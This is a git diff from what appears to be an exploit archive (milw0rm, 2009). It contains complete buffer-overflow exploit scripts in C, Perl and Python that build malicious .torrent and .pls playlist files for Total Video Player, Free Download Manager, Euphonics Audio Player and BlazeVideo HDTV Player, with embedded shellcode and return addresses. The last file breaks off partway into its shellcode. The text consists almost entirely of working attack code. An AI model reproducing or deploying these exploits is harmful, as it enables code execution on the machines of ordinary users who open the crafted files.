+"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
+"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
+"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
+"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
+"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
+"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
+"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
+"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
+"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
+"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
+"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
+"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
+"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
+"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
+"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
+"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
+"\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
+
+
+
+
+int main(int argc,char *argv[]){
+    FILE *openfile;
+    unsigned char *buffer;
+    unsigned int offset=0;
+    unsigned int RET=0x7c85d568;
+    int number=0;
+                 printf("*********************************************************\n");
+                 printf("Total Video Player local universal buffer overflow exploit\n");
+                 printf("Cded by SimO-s0fT(simo_at_exploiter-ma.com)");
+                 printf("greetz : to Allah \n");
+                 printf("this exploit is for my best friends : Sup3r-crystal & mr.5rab & Hack back\n");
+                 printf("***********************************************************\n");
+    scanf("%d",&number);
+    if((openfile=fopen(argv[1],"wb"))==NULL){
+                                            perror("connot opening .....!!\n");
+                                            exit(0);
+                                            }
+    switch(number){
+                   case 1: buffer = (unsigned char *) malloc (OFFSET+strlen(scode1)+sizeof(RET));
+                                            memset(buffer,0x90,OFFSET+strlen(scode1)+sizeof(RET));
+                                            offset=OFFSET;
+                                            memcpy(buffer+offset,&RET,sizeof(RET)-1);
+                                            offset+=sizeof(RET);
+                                            memcpy(buffer+offset,scode1,strlen(scode1));
+                                            offset+=strlen(scode1);
+                                            fputs(twacha,openfile);
+                                            fputs(buffer,openfile);
+                                            fclose(openfile);
+                                            printf("File created ....!\n"
+                                                         "open it with tvp\n");
+                                            break;
+                                            
+                   case 2: buffer = (unsigned char*) malloc(OFFSET+strlen(scode2)+sizeof(RET));
+                                            memset(buffer,0x90,OFFSET+strlen(scode2)+sizeof(RET));
+                                            offset = OFFSET;
+                                            memcpy(buffer+offset,&RET,sizeof(RET)-1);
+                                            offset+=sizeof(RET);
+                                            memcpy(buffer+offset,scode2,strlen(scode2));
+                                            offset=strlen(scode2);
+                                            fputs(twacha,openfile);
+                                            fputs(buffer,openfile);
+                                            fclose(openfile);
+                                            printf("File created ....!\n"
+                                                         "open it with tvp\n");
+                                            break;
+                   }
+                   
+    free(buffer);
+    return 0;
+} 
+
+// milw0rm.com [2009-01-29]
diff --git a/platforms/windows/local/7957.pl b/platforms/windows/local/7957.pl
index af4bc2dea..4417a6f67 100755
--- a/platforms/windows/local/7957.pl
+++ b/platforms/windows/local/7957.pl
@@ -1,94 +1,94 @@
-#!/usr/bin/perl
-#
-# Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit
-# -----------------------------------------------------------
-# Exploit by SkD 			 (skdrat@hotmail.com)
-#
-# Vendors URL =
-# [www.freedownloadmanager.org]
-# Download FDM 3.0 Build 844 =
-# [http://www.download.com/Free-Download-Manager/3000-2071_4-10301621.html]
-# (Downloaded by over 1.6 million users!)
-#
-# This is another one of the more advanced exploitation methods
-# for buffer overflows using my method called "shell building".
-# It utilizes a SEH overflow and then a shellcode builder/assembler
-# "builds"/or "assembles" bytes that were deleted by transformation
-# of the buffer so that the shellcode will work without a flaw.
-# I have been able to do this because of my recent experiences with
-# UNICODE based overflows (heap & stack). This is a demonstration
-# of how you can obtain power with limitations to buffer.
-# Of course I could have used my shellhunting technique,
-# but this is a new method, and to demonstrate it in a world of
-# dying buffer overflows is important for me.
-#
-# Unfortunately I did not have time to make this a universal exploit
-# so it will only work on all NT systems EXCEPT Vista (due to randomized
-# heap, etc). But with a few modifications it can work (sure of it).
-# Read my notes & comments in the script for more info.
-#
-# Tested on Windows XP SP3 (Fully Patched) & Windows 2000 SP4.
-#
-# Note: Author has no responsibility over the damage you do with this!
-
-use strict;
-use warnings;
-
-my $tdata1 = "\x64\x38\x3A\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x31\x32\x3A\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x37\x3A\x63\x6F\x6D".
-	     "\x6D\x65\x6E\x74\x31\x32\x3A\x63\x6F\x6D\x6D\x65\x6E\x74\x74\x74\x74\x74\x74\x31\x33\x3A\x63\x72\x65\x61\x74\x69\x6F\x6E\x20".
-	     "\x64\x61\x74\x65\x69\x31\x32\x33\x33\x36\x31\x36\x35\x30\x37\x65\x34\x3A\x69\x6E\x66\x6F\x64\x36\x3A\x6C\x65\x6E\x67\x74\x68".
-	     "\x69\x39\x31\x37\x33\x34\x65\x34\x3A\x6E\x61\x6D\x65\x31\x32\x39\x39\x39\x3A";
-my $tdata2 = "\x31\x32\x3A\x70\x69\x65\x63\x65\x20\x6C\x65\x6E\x67\x74\x68\x69\x32\x36\x32\x31\x34\x34\x65\x36\x3A\x70\x69\x65\x63\x65\x73".
-	     "\x32\x30\x3A\x10\x7F\xD5\x50\xE2\x70\xA5\x80\x61\x42\x7B\x53\x08\xE0\xCE\xFE\x9C\xDA\x2E\xE1\x65\x65";
-
-# win32_exec -  EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-my $shellcode =
-"\x01\xeb\x03\x59\x01\xeb\x05\x01\xe8\x01\xf8\x01\xff\x01\xff\x01\xff\x4f\x49\x49\x49\x49\x49".
-#Notice I added 0x01 byte before each 0x80=> byte.
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x51\x4b\x38".
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x48".
-"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x57\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
-"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58".
-"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x53\x45\x58\x42\x4c\x4a\x37".
-"\x4e\x50\x4b\x58\x42\x34\x4e\x30\x4b\x58\x42\x57\x4e\x31\x4d\x4a".
-"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
-"\x42\x50\x42\x30\x42\x30\x4b\x58\x4a\x36\x4e\x53\x4f\x35\x41\x53".
-"\x48\x4f\x42\x36\x48\x35\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x37".
-"\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x56\x4a\x59".
-"\x50\x4f\x4c\x48\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x36\x43\x46\x42\x30\x5a";
-
-#This is the shellcode builder or assembler. It gets the location of the shellcode and then from there does
-#the appropriate modifications to apply the correct hex bytes that were deleted off the buffer (0x80=> bytes).
-#You can only use the Alpha numerical shellcodes for the Shellcode builder ;), but remember to add
-#0x01 before each 0x80=> byte.
-my $shellcode_builder = ("\x59" x 3 ."\x40" x 9 . "\x51\x5b"."\x4b" x 4 ."\x01\x03"."\x48" x 10 ."\x43\x01\x03" x 3).
-			("\x4b" x 3 ."\x03\x0b" x 35 ."\x41" x 14 ."\x41\x01\x01\x01\x01"."\x41\x01\x01" x 2).
-                        ("\x49" x 3 ."\x48"."\x01\x01" x 5 ."\x40" x 3 ."\x01\x01\x41\x01\x01").
-                        ("\x49" x 2 ."\x48" x 3 ."\x01\x01" x 13 ."\x40" x 3 ."\x01\x01\x41\x01\x01").
-                        ("\x49" x 3 ."\x48" x 3 ."\x01\x01" x 11 ."\x49" x 3 ."\x01\x01" x 11).
-                        ("\x40" x 3 ."\x41\x01\x01"."\x41" x 3 ."\x01\x01"."\x41" x 6 ."\x01\x01");
-my $len = 12999 - (10000 + (350 - length($shellcode_builder)) + length($shellcode) + 12 + length($shellcode_builder)); #Really important calculation to overflow the stack													       #and set everything in the right places(ret,addr,etc).
-my $shellcode_builder_label = "\x01\x01\x01\x01"; #Used as a 'label' to create a DWORD 0x0000000a used in a calculation to get shellcode location.
-my $overflow1 = "\x41" x 10000;
-my $overflow2 = "\x41" x $len;
-my $sled = "\x41" x (350 - length($shellcode_builder));
-my $sehjmp = "\x71\x06\x01\x01"; #Since we cannot use 0xEB, I am going to use another type of jump ;)
-my $sehret = "\x1a\x09\x03\x10"; #0x1003091A fumcore.dll POP ESI, POP EDI, RETN (For XP <= Systems)
-
-open(my $torrent, "> s.torrent");
-print $torrent $tdata1.
-	       $overflow1.$shellcode_builder_label.$sehjmp.$sehret.$shellcode_builder.$sled.$shellcode.$overflow2.
-               $tdata2;
-close $torrent;
-
-# milw0rm.com [2009-02-03]
+#!/usr/bin/perl
+#
+# Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit
+# -----------------------------------------------------------
+# Exploit by SkD 			 (skdrat@hotmail.com)
+#
+# Vendors URL =
+# [www.freedownloadmanager.org]
+# Download FDM 3.0 Build 844 =
+# [http://www.download.com/Free-Download-Manager/3000-2071_4-10301621.html]
+# (Downloaded by over 1.6 million users!)
+#
+# This is another one of the more advanced exploitation methods
+# for buffer overflows using my method called "shell building".
+# It utilizes a SEH overflow and then a shellcode builder/assembler
+# "builds"/or "assembles" bytes that were deleted by transformation
+# of the buffer so that the shellcode will work without a flaw.
+# I have been able to do this because of my recent experiences with
+# UNICODE based overflows (heap & stack). This is a demonstration
+# of how you can obtain power with limitations to buffer.
+# Of course I could have used my shellhunting technique,
+# but this is a new method, and to demonstrate it in a world of
+# dying buffer overflows is important for me.
+#
+# Unfortunately I did not have time to make this a universal exploit
+# so it will only work on all NT systems EXCEPT Vista (due to randomized
+# heap, etc). But with a few modifications it can work (sure of it).
+# Read my notes & comments in the script for more info.
+#
+# Tested on Windows XP SP3 (Fully Patched) & Windows 2000 SP4.
+#
+# Note: Author has no responsibility over the damage you do with this!
+
+use strict;
+use warnings;
+
+my $tdata1 = "\x64\x38\x3A\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x31\x32\x3A\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x37\x3A\x63\x6F\x6D".
+	     "\x6D\x65\x6E\x74\x31\x32\x3A\x63\x6F\x6D\x6D\x65\x6E\x74\x74\x74\x74\x74\x74\x31\x33\x3A\x63\x72\x65\x61\x74\x69\x6F\x6E\x20".
+	     "\x64\x61\x74\x65\x69\x31\x32\x33\x33\x36\x31\x36\x35\x30\x37\x65\x34\x3A\x69\x6E\x66\x6F\x64\x36\x3A\x6C\x65\x6E\x67\x74\x68".
+	     "\x69\x39\x31\x37\x33\x34\x65\x34\x3A\x6E\x61\x6D\x65\x31\x32\x39\x39\x39\x3A";
+my $tdata2 = "\x31\x32\x3A\x70\x69\x65\x63\x65\x20\x6C\x65\x6E\x67\x74\x68\x69\x32\x36\x32\x31\x34\x34\x65\x36\x3A\x70\x69\x65\x63\x65\x73".
+	     "\x32\x30\x3A\x10\x7F\xD5\x50\xE2\x70\xA5\x80\x61\x42\x7B\x53\x08\xE0\xCE\xFE\x9C\xDA\x2E\xE1\x65\x65";
+
+# win32_exec -  EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+my $shellcode =
+"\x01\xeb\x03\x59\x01\xeb\x05\x01\xe8\x01\xf8\x01\xff\x01\xff\x01\xff\x4f\x49\x49\x49\x49\x49".
+#Notice I added 0x01 byte before each 0x80=> byte.
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x51\x4b\x38".
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x48".
+"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x57\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
+"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58".
+"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x53\x45\x58\x42\x4c\x4a\x37".
+"\x4e\x50\x4b\x58\x42\x34\x4e\x30\x4b\x58\x42\x57\x4e\x31\x4d\x4a".
+"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
+"\x42\x50\x42\x30\x42\x30\x4b\x58\x4a\x36\x4e\x53\x4f\x35\x41\x53".
+"\x48\x4f\x42\x36\x48\x35\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x37".
+"\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x56\x4a\x59".
+"\x50\x4f\x4c\x48\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x36\x43\x46\x42\x30\x5a";
+
+#This is the shellcode builder or assembler. It gets the location of the shellcode and then from there does
+#the appropriate modifications to apply the correct hex bytes that were deleted off the buffer (0x80=> bytes).
+#You can only use the Alpha numerical shellcodes for the Shellcode builder ;), but remember to add
+#0x01 before each 0x80=> byte.
+my $shellcode_builder = ("\x59" x 3 ."\x40" x 9 . "\x51\x5b"."\x4b" x 4 ."\x01\x03"."\x48" x 10 ."\x43\x01\x03" x 3).
+			("\x4b" x 3 ."\x03\x0b" x 35 ."\x41" x 14 ."\x41\x01\x01\x01\x01"."\x41\x01\x01" x 2).
+                        ("\x49" x 3 ."\x48"."\x01\x01" x 5 ."\x40" x 3 ."\x01\x01\x41\x01\x01").
+                        ("\x49" x 2 ."\x48" x 3 ."\x01\x01" x 13 ."\x40" x 3 ."\x01\x01\x41\x01\x01").
+                        ("\x49" x 3 ."\x48" x 3 ."\x01\x01" x 11 ."\x49" x 3 ."\x01\x01" x 11).
+                        ("\x40" x 3 ."\x41\x01\x01"."\x41" x 3 ."\x01\x01"."\x41" x 6 ."\x01\x01");
+my $len = 12999 - (10000 + (350 - length($shellcode_builder)) + length($shellcode) + 12 + length($shellcode_builder)); #Really important calculation to overflow the stack													       #and set everything in the right places(ret,addr,etc).
+my $shellcode_builder_label = "\x01\x01\x01\x01"; #Used as a 'label' to create a DWORD 0x0000000a used in a calculation to get shellcode location.
+my $overflow1 = "\x41" x 10000;
+my $overflow2 = "\x41" x $len;
+my $sled = "\x41" x (350 - length($shellcode_builder));
+my $sehjmp = "\x71\x06\x01\x01"; #Since we cannot use 0xEB, I am going to use another type of jump ;)
+my $sehret = "\x1a\x09\x03\x10"; #0x1003091A fumcore.dll POP ESI, POP EDI, RETN (For XP <= Systems)
+
+open(my $torrent, "> s.torrent");
+print $torrent $tdata1.
+	       $overflow1.$shellcode_builder_label.$sehjmp.$sehret.$shellcode_builder.$sled.$shellcode.$overflow2.
+               $tdata2;
+close $torrent;
+
+# milw0rm.com [2009-02-03]
diff --git a/platforms/windows/local/7973.pl b/platforms/windows/local/7973.pl
index 7ce59259d..bfd9ab3a4 100755
--- a/platforms/windows/local/7973.pl
+++ b/platforms/windows/local/7973.pl
@@ -1,38 +1,38 @@
-#!/usr/bin/perl -w
-#-----------------------------------------------------------------------------
-# Author : Houssamix
-
-# Euphonics Audio Player v1.0 (.pls) Universal Local Buffer Overflow Exploit
-# Gr33tz to : str0ke , real-power.net , Legend-spy - stack 
-
-# thx to h4ck3r#47 for the fisrt exploit http://milw0rm.com/exploits/7958
-# just the ret adress is changed for make the exploit universal
-
-#-----------------------------------------------------------------------------
-my $overflow = "\x41" x 1324;
-my $ret = "\xCB\xA3\x0F\x10"; # jmp esp from AdjMmsEng.dll <= universal adress
-my $nop = "\x90" x 100 ;
-
-# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/
-my $shellcode =
-"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34".
-"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\x06\x83\x34\x92\xc9\xc6".
-"\x08\x19\x3e\x86\x4c\x93\xad\x08\x7b\x8a\xc9\xdc\x14\x93\xa9\xca".
-"\xbf\xa6\xc9\x82\xda\xa3\x82\x1a\x98\x16\x82\xf7\x33\x53\x88\x8e".
-"\x35\x50\xa9\x77\x0f\xc6\x66\x87\x41\x77\xc9\xdc\x10\x93\xa9\xe5".
-"\xbf\x9e\x09\x08\x6b\x8e\x43\x68\xbf\x8e\xc9\x82\xdf\x1b\x1e\xa7".
-"\x30\x51\x73\x43\x50\x19\x02\xb3\xb1\x52\x3a\x8f\xbf\xd2\x4e\x08".
-"\x44\x8e\xef\x08\x5c\x9a\xa9\x8a\xbf\x12\xf2\x83\x34\x92\xc9\xeb".
-"\x08\xcd\x73\x75\x54\xc4\xcb\x7b\xb7\x52\x39\xd3\x5c\x62\xc8\x87".
-"\x6b\xfa\xda\x7d\xbe\x9c\x15\x7c\xd3\xf1\x23\xef\x57\xbc\x27\xfb".
-"\x51\x92\x42\x83";
-
-my $file="hsmx.pls";
-
-$exploit = $overflow.$ret.$nop.$shellcode;
-open(my $FILE, ">>$file") or die "Cannot open $file: $!";
-print $FILE $exploit ;
-close($FILE);
-print "Done \n";
-
-# milw0rm.com [2009-02-04]
+#!/usr/bin/perl -w
+#-----------------------------------------------------------------------------
+# Author : Houssamix
+
+# Euphonics Audio Player v1.0 (.pls) Universal Local Buffer Overflow Exploit
+# Gr33tz to : str0ke , real-power.net , Legend-spy - stack 
+
+# thx to h4ck3r#47 for the fisrt exploit http://milw0rm.com/exploits/7958
+# just the ret adress is changed for make the exploit universal
+
+#-----------------------------------------------------------------------------
+my $overflow = "\x41" x 1324;
+my $ret = "\xCB\xA3\x0F\x10"; # jmp esp from AdjMmsEng.dll <= universal adress
+my $nop = "\x90" x 100 ;
+
+# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/
+my $shellcode =
+"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34".
+"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\x06\x83\x34\x92\xc9\xc6".
+"\x08\x19\x3e\x86\x4c\x93\xad\x08\x7b\x8a\xc9\xdc\x14\x93\xa9\xca".
+"\xbf\xa6\xc9\x82\xda\xa3\x82\x1a\x98\x16\x82\xf7\x33\x53\x88\x8e".
+"\x35\x50\xa9\x77\x0f\xc6\x66\x87\x41\x77\xc9\xdc\x10\x93\xa9\xe5".
+"\xbf\x9e\x09\x08\x6b\x8e\x43\x68\xbf\x8e\xc9\x82\xdf\x1b\x1e\xa7".
+"\x30\x51\x73\x43\x50\x19\x02\xb3\xb1\x52\x3a\x8f\xbf\xd2\x4e\x08".
+"\x44\x8e\xef\x08\x5c\x9a\xa9\x8a\xbf\x12\xf2\x83\x34\x92\xc9\xeb".
+"\x08\xcd\x73\x75\x54\xc4\xcb\x7b\xb7\x52\x39\xd3\x5c\x62\xc8\x87".
+"\x6b\xfa\xda\x7d\xbe\x9c\x15\x7c\xd3\xf1\x23\xef\x57\xbc\x27\xfb".
+"\x51\x92\x42\x83";
+
+my $file="hsmx.pls";
+
+$exploit = $overflow.$ret.$nop.$shellcode;
+open(my $FILE, ">>$file") or die "Cannot open $file: $!";
+print $FILE $exploit ;
+close($FILE);
+print "Done \n";
+
+# milw0rm.com [2009-02-04]
diff --git a/platforms/windows/local/7974.c b/platforms/windows/local/7974.c
index ba1dd6a90..4871182ca 100755
--- a/platforms/windows/local/7974.c
+++ b/platforms/windows/local/7974.c
@@ -1,42 +1,42 @@
-#include <stdio.h>
-#include <windows.h>
-#include <string.h>
-#define overflow 1324
-#define NOP 0x90
-#define pls "Eye.pls"
-
-int main (int argc,char **argv)
-{
-char winsp3[] = "\x7B\x46\x86\x7C";
-char buffer[overflow];
-FILE *Player;
-
-unsigned char shellcode[] =
-"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xec"
-"\x96\x7d\xb2\x83\xeb\xfc\xe2\xf4\x10\x7e\x39\xb2\xec\x96\xf6\xf7"
-"\xd0\x1d\x01\xb7\x94\x97\x92\x39\xa3\x8e\xf6\xed\xcc\x97\x96\xfb"
-"\x67\xa2\xf6\xb3\x02\xa7\xbd\x2b\x40\x12\xbd\xc6\xeb\x57\xb7\xbf"
-"\xed\x54\x96\x46\xd7\xc2\x59\xb6\x99\x73\xf6\xed\xc8\x97\x96\xd4"
-"\x67\x9a\x36\x39\xb3\x8a\x7c\x59\x67\x8a\xf6\xb3\x07\x1f\x21\x96"
-"\xe8\x55\x4c\x72\x88\x1d\x3d\x82\x69\x56\x05\xbe\x67\xd6\x71\x39"
-"\x9c\x8a\xd0\x39\x84\x9e\x96\xbb\x67\x16\xcd\xb2\xec\x96\xf6\xda"
-"\xd0\xc9\x4c\x44\x8c\xc0\xf4\x4a\x6f\x56\x06\xe2\x84\x66\xf7\xb6"
-"\xb3\xfe\xe5\x4c\x66\x98\x2a\x4d\x0b\xf5\x1c\xde\x8f\xb8\x18\xca"
-"\x89\x96\x7d\xb2";
-
-printf("\n******************************************");
-printf("\n* THIS BUG ORGINAL DISCOVER BY h4ck3r#47 *");
-printf("\n* THIS BUG C0DED BY SINGLE EYE           *");
-printf("\n* SPECIAL THANKS TO STR0KE               *");
-printf("\n******************************************");
-memset(buffer,NOP,overflow);
-memcpy(buffer,shellcode,sizeof(shellcode)-1);
-buffer[overflow] = 0;
-Player = fopen(pls,"w+");
-fwrite(Player,sizeof(unsigned char),sizeof(buffer),Player);
-fclose(Player);
-printf("\n DOne Poc !!");
-return 0;
-}
-
-// milw0rm.com [2009-02-04]
+#include <stdio.h>
+#include <windows.h>
+#include <string.h>
+#define overflow 1324
+#define NOP 0x90
+#define pls "Eye.pls"
+
+int main (int argc,char **argv)
+{
+char winsp3[] = "\x7B\x46\x86\x7C";
+char buffer[overflow];
+FILE *Player;
+
+unsigned char shellcode[] =
+"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xec"
+"\x96\x7d\xb2\x83\xeb\xfc\xe2\xf4\x10\x7e\x39\xb2\xec\x96\xf6\xf7"
+"\xd0\x1d\x01\xb7\x94\x97\x92\x39\xa3\x8e\xf6\xed\xcc\x97\x96\xfb"
+"\x67\xa2\xf6\xb3\x02\xa7\xbd\x2b\x40\x12\xbd\xc6\xeb\x57\xb7\xbf"
+"\xed\x54\x96\x46\xd7\xc2\x59\xb6\x99\x73\xf6\xed\xc8\x97\x96\xd4"
+"\x67\x9a\x36\x39\xb3\x8a\x7c\x59\x67\x8a\xf6\xb3\x07\x1f\x21\x96"
+"\xe8\x55\x4c\x72\x88\x1d\x3d\x82\x69\x56\x05\xbe\x67\xd6\x71\x39"
+"\x9c\x8a\xd0\x39\x84\x9e\x96\xbb\x67\x16\xcd\xb2\xec\x96\xf6\xda"
+"\xd0\xc9\x4c\x44\x8c\xc0\xf4\x4a\x6f\x56\x06\xe2\x84\x66\xf7\xb6"
+"\xb3\xfe\xe5\x4c\x66\x98\x2a\x4d\x0b\xf5\x1c\xde\x8f\xb8\x18\xca"
+"\x89\x96\x7d\xb2";
+
+printf("\n******************************************");
+printf("\n* THIS BUG ORGINAL DISCOVER BY h4ck3r#47 *");
+printf("\n* THIS BUG C0DED BY SINGLE EYE           *");
+printf("\n* SPECIAL THANKS TO STR0KE               *");
+printf("\n******************************************");
+memset(buffer,NOP,overflow);
+memcpy(buffer,shellcode,sizeof(shellcode)-1);
+buffer[overflow] = 0;
+Player = fopen(pls,"w+");
+fwrite(Player,sizeof(unsigned char),sizeof(buffer),Player);
+fclose(Player);
+printf("\n DOne Poc !!");
+return 0;
+}
+
+// milw0rm.com [2009-02-04]
diff --git a/platforms/windows/local/7975.py b/platforms/windows/local/7975.py
index 69ea3a3de..892c18edd 100755
--- a/platforms/windows/local/7975.py
+++ b/platforms/windows/local/7975.py
@@ -1,82 +1,82 @@
-#!/usr/bin/python
-#
-# Title: BlazeVideo HDTV Player <= 3.5 PLF Playlist File  Remote Heap Overflow Exploit
-#
-# Summary: BlazeVideo HDTV Player (BlazeDTV) is a full-featured and easy-to-use HDTV
-# Player software, combining HDTV playback, FM receiving, video record and DVD playback
-# functions. You can make advantage of PC monitor's high resolution, watch, record, playback
-# high definition HDTV program or teletext broadcast program.
-#
-# Product web page: http://www.blazevideo.com/hdtv-player/index.htm
-#
-# Tested on Microsoft Windows XP Professional SP2 (English)
-#
-# ------------------------------------windbg------------------------------------
-#
-# (620.d74): Access violation - code c0000005 (first chance)
-# First chance exceptions are reported before any exception handling.
-# This exception may be expected and handled.
-# eax=00000001 ebx=77f6c15c ecx=04eb0dc0 edx=00000042 esi=0266ffc0 edi=00000001
-# eip=43434343 esp=0013f288 ebp=6405247c iopl=0         nv up ei pl nz ac pe nc
-# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
-# 43434343 ??              ???
-#
-#--------------------------------------------------------------------------------
-#
-# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
-#
-# liquidworm [t00t] gmail [w00t] com
-#
-# http://www.zeroscience.org/
-#
-# 03.01.2009
-#
-
-
-print "--------------------------------------------------------------------------"
-print " BlazeVideo HDTV Player <= 3.5 Playlist File Remote Heap Overflow Exploit\n"
-print "\t\t\tby LiquidWorm [liquidworm[t00t]gmail.com] - 2009\n"
-print "--------------------------------------------------------------------------"
-
-buffer = "\x41" * 260
-
-eip = "\xc0\x25\x49\x7e" #jmp esp  user32.dll
-
-nop = "\x90" * 15
-
-# win32_exec -  EXITFUNC=thread CMD=sol Size=328 Encoder=Alpha2 http://metasploit.com
-shellcode = (
-	"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
-	"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x48\x6a\x65"
-	"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x75\x32\x41\x42\x32\x42"
-	"\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x39\x79\x6b\x4c\x4a"
-	"\x48\x47\x34\x43\x30\x45\x50\x57\x70\x4c\x4b\x71\x55\x77\x4c\x4c"
-	"\x4b\x71\x6c\x37\x75\x30\x78\x75\x51\x78\x6f\x4c\x4b\x52\x6f\x32"
